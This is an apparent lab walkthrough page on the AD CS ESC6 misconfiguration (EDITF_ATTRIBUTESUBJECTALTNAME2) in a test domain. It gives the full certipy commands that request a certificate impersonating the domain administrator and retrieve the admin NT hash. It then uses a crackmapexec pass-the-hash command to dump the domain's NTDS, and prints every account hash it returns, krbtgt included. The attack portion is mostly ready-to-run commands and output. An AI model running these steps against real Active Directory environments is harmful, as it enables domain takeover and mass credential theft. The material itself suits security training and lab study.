ADCS - ESC6

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Another way to supply arbitrary SANs, described in a CQure Academy post, involves the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. As Microsoft describes, “If this flag is set on the CA, any request (including when the subject is built from Active Directory®) can have user defined values in the subject alternative name.” This means that ANY template configured for domain authentication that also allows unprivileged users to enroll (e.g., the default User template) can be abused to obtain a certificate that allows us to authenticate as a domain admin (or any other active user/machine). As this Keyfactor post describes, this setting “just makes it work”, which is why it’s likely flipped in many environments by sysadmins who don’t fully understand the security implications.

As said on certipy page : “ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. This flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration.”
Because MARYLAND-CA is vulnerable to ESC6 we can do the ESC1 attack but with the user template instead of the ESC1 template even if the user template got Enrollee Supplies Subject set to false.

Find the Vulnerability

sudo certipy find -u joaquin.Pereida@maryland.local -p 'horse' -vulnerable -dc-ip 192.168.56.12 -stdout

certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target salisbury.maryland.local -template User -ca MARYLAND-CA -upn administrator@maryland.local

certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@maryland.local': aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da

Dump it ntds with CME

crackmapexec smb 192.168.56.12 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' --ntds


/usr/lib/python3/dist-packages/paramiko/transport.py:219: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
SMB         192.168.56.12   445    BALTIMORE        [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB         192.168.56.12   445    BALTIMORE        [+] maryland.local\administrator:54296a48cd30259cc88095373cec24da (Pwn3d!)
SMB         192.168.56.12   445    BALTIMORE        [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.56.12   445    BALTIMORE        Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB         192.168.56.12   445    BALTIMORE        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1ad253c7f9110449bd1ccbcadf2ca611:::
SMB         192.168.56.12   445    BALTIMORE        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.56.12   445    BALTIMORE        vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB         192.168.56.12   445    BALTIMORE        carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
SMB         192.168.56.12   445    BALTIMORE        marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB         192.168.56.12   445    BALTIMORE        joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB         192.168.56.12   445    BALTIMORE        teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB         192.168.56.12   445    BALTIMORE        sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         192.168.56.12   445    BALTIMORE        BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759:::
SMB         192.168.56.12   445    BALTIMORE        SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:12df918c6cba0ab538b68f10071a1fa5:::
SMB         192.168.56.12   445    BALTIMORE        newyork$:1105:aad3b435b51404eeaad3b435b51404ee:16827e6dccaaa8328e7092324980f207:::
SMB         192.168.56.12   445    BALTIMORE        [+] Dumped 13 NTDS hashes to /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds of which 10 were added to the database
SMB         192.168.56.12   445    BALTIMORE        [*] To extract only enabled accounts from the output file, run the following command: 
SMB         192.168.56.12   445    BALTIMORE        [*] cat /home/watchdog/.cme/logs/BALTIMORE_192.168.56.12_2023-02-26_221347.ntds | grep -iv disabled | cut -d ':' -f

PreviousADCS - ESC4 NextCertifried - CVE-2022–26923

Last updated 2 years ago

hashtagEDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

hashtagFind the Vulnerability

hashtagDump it ntds with CME

EDITF_ATTRIBUTESUBJECTALTNAME2 — ESC6

Find the Vulnerability

Dump it ntds with CME